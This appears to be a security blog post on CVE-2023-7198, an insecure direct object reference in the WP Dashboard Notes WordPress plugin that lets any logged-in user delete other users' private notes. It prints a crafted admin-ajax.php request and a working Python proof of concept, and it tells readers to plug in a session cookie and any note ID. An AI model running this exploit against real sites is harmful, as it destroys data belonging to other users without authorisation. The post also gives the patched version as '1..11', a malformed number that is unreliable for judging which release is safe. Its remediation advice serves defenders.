In early 2024, a critical security issue was found in the WP Dashboard Notes WordPress plugin. Tagged as CVE-2023-7198, this vulnerability directly affects versions before 1..11 and allows authenticated users to delete private notes of other users—a clear violation of user privacy and data security.
If you have this plugin installed on your WordPress site, read on to understand the risk, see actual exploit code, and get advice on how to secure your site.
What Is CVE-2023-7198?
The core of this bug is an Insecure Direct Object Reference (IDOR). In simple terms, this means that a user can manipulate input parameters to access or affect data they shouldn’t be able to.
With WP Dashboard Notes before version 1..11, any logged-in user—not just admins—can guess or view the internal ID of a private note belonging to someone else. By sending a specially crafted request, they can delete notes across all accounts.
How the Attack Works
The heart of the exploit is a POST request to the WordPress admin-ajax.php file. The vulnerable parameter is post_id, which refers to the note’s unique ID in the database.
Let’s look at a typical vulnerable request
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim-site.com
Cookie: wordpress_logged_in_user_credentials
Content-Type: application/x-www-form-urlencoded
action=delete_dashboard_note&post_id=42
action=delete_dashboard_note tells WP Dashboard Notes to process the delete operation.
- post_id=42 specifies *which* note to delete. Here, “42” could be any note—*even if it doesn’t belong to the current user!*
Here’s a proof-of-concept in Python using the requests library
import requests
site_url = 'https://victim-site.com/wp-admin/admin-ajax.php';
wordpress_cookies = {
'wordpress_logged_in_your_cookie': 'YOUR_SESSION_COOKIE_HERE'
}
note_id_to_delete = 42 # Change this to any note ID
payload = {
'action': 'delete_dashboard_note',
'post_id': note_id_to_delete
}
response = requests.post(site_url, data=payload, cookies=wordpress_cookies)
print('Status Code:', response.status_code)
print('Response:', response.text)
Just swap in your authenticated session cookie (even for a low-privileged user) and the chosen post_id, and you’re able to delete someone else’s private note!
Disrupt communication: Malicious users could erase notes used by site managers or admins.
- Erase evidence: If users log changes or discussions in private notes, a rogue user could cover their tracks.
- Personal data leaks: While the attacker cannot *read* private notes directly, erasing them still disrupts confidentiality and trust.
Why Did This Happen?
The plugin’s code failed to restrict note deletion to the owner or authorized roles. It did not check if the authenticated user had permission to delete the note referenced by post_id. Proper validation should always restrict actions to the relevant data owner.
Update WP Dashboard Notes Immediately
The vulnerability is patched in version 1..11. Update via your WordPress dashboard or download directly from the plugin page.
References and Further Reading
- WPScan – CVE-2023-7198 Advisory
- NVD – National Vulnerability Database Entry
- Plugin Changelog
- IDOR Exploit Explained (PortSwigger)
Conclusion
Exploiting CVE-2023-7198 is as simple as guessing someone else’s note ID and sending a crafted POST request—it doesn’t take a high-level hacker. The takeaway: patch early, restrict user privileges, and always keep an eye out for insecure object references.
If your site uses WP Dashboard Notes, *update now* and keep your user content safe.
*Have questions or thoughts? Drop them below! For more WordPress security news, keep following our updates.*
Timeline
Published on: 02/27/2024 09:15:37 UTC
Last modified on: 03/24/2025 20:15:16 UTC